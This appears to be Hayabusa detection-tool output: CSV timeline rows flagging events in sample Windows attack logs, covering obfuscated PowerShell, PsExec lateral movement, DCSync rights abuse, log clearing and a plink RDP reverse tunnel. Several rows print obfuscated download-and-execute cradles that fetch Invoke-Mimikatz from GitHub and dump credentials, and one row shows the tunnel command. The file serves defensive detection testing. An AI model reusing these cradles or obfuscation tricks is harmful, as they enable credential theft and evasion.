+2017-08-31 04:16:21.081 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.085 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.089 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.107 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.118 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.272 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) 
{$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.286 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:21.338 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:25.959 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"' '| FOrEAcH-ObJect { $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . ( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:25.959 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . 
( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:25.960 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:25.963 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ $_.lENGTh- 1 },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:16:26.128 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Char][iNT]$_)},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:25:04.174 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('IEX ('+'New'+'-Object'+' Net.Web'+'Client'+')'+'.DownloadString(oH'+'4http'+'s:'+'//raw'+'.g'+'it'+'hubuse'+'rcontent.c'+'om/m'+'at'+'tifes'+'t'+'a'+'tion/'+'Po'+'we'+'rSploit/ma'+'s'+'ter/Exfiltra'+'tion'+'/I'+'nvoke-Mimikat'+'z.ps1oH4'+'); Invoke-Mimi'+'katz -Du'+'mpCred'+'s') -REpLacE ([cHaR]111+[cHaR]72+[cHaR]52),[cHaR]39)| IEx",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-31 04:25:20.783 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(((""{41}{32}{44}{45}{20}{36}{35}{21}{10}{40}{29}{42}{26}{28}{1}{19}{15}{11}{48}{49}{39}{30}{4}{18}{47}{31}{24}{23}{33}{43}{12}{13}{7}{8}{22}{46}{14}{27}{25}{5}{0}{34}{6}{16}{17}{38}{3}{9}{2}{37}"" 
-f'1','ubuserco','Dump','tz ','festati','atz.ps','); In','s','t','-','p','m/','/','ma','ion/I','co','vok','e-M','on','ntent.','load','t','er','l','p','e-Mimik','.','nvok','gith',':','ti','rS',' (New-','o','{0}','t','String({0}h','Creds','imika','t','s','IEX','//raw','it','Object Net.WebCli','ent).Down','/Exfiltrat','/Powe','m','a')) -F [ChaR]39) | . ( $ShelliD[1]+$sHELliD[13]+'X')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-31 04:25:48.631 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$l7i= "" ))93]RaHc[ f- )'sderCpmuD-'+' ztak'+'imi'+'M'+'-e'+'kovnI'+' '+';)}0{'+'1sp.'+'ztaki'+'mi'+'M-ekovnI/no'+'i'+'ta'+'rtl'+'ifx'+'E/'+'retsa'+'m/'+'tiolpSrewoP'+'/no'+'itats'+'e'+'fitt'+'am'+'/moc'+'.tne'+'tn'+'o'+'cresu'+'buhtig'+'.war//:sptth}0{(gn'+'ir'+'tSdaol'+'n'+'woD.)'+'tne'+'ilCb'+'eW.t'+'eN t'+'c'+'ejbO-w'+'eN('+' X'+'EI'(( ( )'x'+]03[emoHSP$+]12[EmOHsp$ ( & ""; ( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE[-1 ..-(( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE.lengTh)]-JOIN''|& ( ([StRiNg]$VERbOsePREferENCe)[1,3]+'X'-join'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-31 04:25:48.647 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,& ( $psHOmE[21]+$PSHome[30]+'x') ( (('IE'+'X '+'(Ne'+'w-Obje'+'c'+'t Ne'+'t.We'+'bCli'+'ent'+').Dow'+'n'+'loadSt'+'ri'+'ng({0}https://raw.'+'github'+'userc'+'o'+'nt'+'ent.'+'com/'+'ma'+'ttif'+'e'+'stati'+'on/'+'PowerSploit'+'/m'+'aster'+'/E'+'xfi'+'ltr'+'at'+'i'+'on/Invoke-M'+'im'+'ikatz'+'.ps1'+'{0});'+' '+'Invok'+'e-'+'M'+'imi'+'katz '+'-DumpCreds') -f 
[cHaR]39)),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
+2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
+2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx
+2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx
+2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: helpdesk | Computer: evil.internal.corp | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: 
EXCHANGE$ | Computer: EXCHANGE | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,info,,Logon Type 3 - Network,User: EXCHANGE$ | Computer: EXCHANGE | IP Addr: 192.168.111.87 | LID: 0x24daa6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,,Logon Type 5 - Service,User: sshd_server | Computer: PC02 | IP Addr: - | LID: 0xe509,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x21f73 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x45120 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,LatMov,RDP Login from Localhost,,../hayabusa-rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x4a26d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x73d02,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 
0x7d4f4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: admin01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,info,,Logon Type 11 - CachedInteractive,User: user01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x1414c8 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,info,,Logon Type 7 - Unlock,User: user01 | Computer: PC01 | IP Addr: - | LID: 0x1414d9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:01.632 
+09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14871d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x148f5d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14a321,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: admin01 | Computer: PC01 | IP Addr: 
127.0.0.1 | LID: 0x14a321 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: admin01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,LatMov,RDP Login from Localhost,,../hayabusa-rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,LatMov,Admin User Remote Logon,,../hayabusa-rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-16 19:01:46.884 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:57182 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:01:50.699 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\plink.exe | PID: 3520 | PGUID: 365ABB72-DD79-5C67-0000-00109C931000,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: plink.exe 
10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test | Process: C:\Users\IEUser\Desktop\plink.exe | User: PC01\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x26656 | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,C2 | LatMov,Suspicious Plink Remote Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:22.965 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49185 (PC01.example.corp) | Dst: 10.0.2.18:80 (PC02) | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49186 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 
365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49186 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:64763 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:61400 (PC01.example.corp) | Dst: 224.0.0.252:5355 () | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 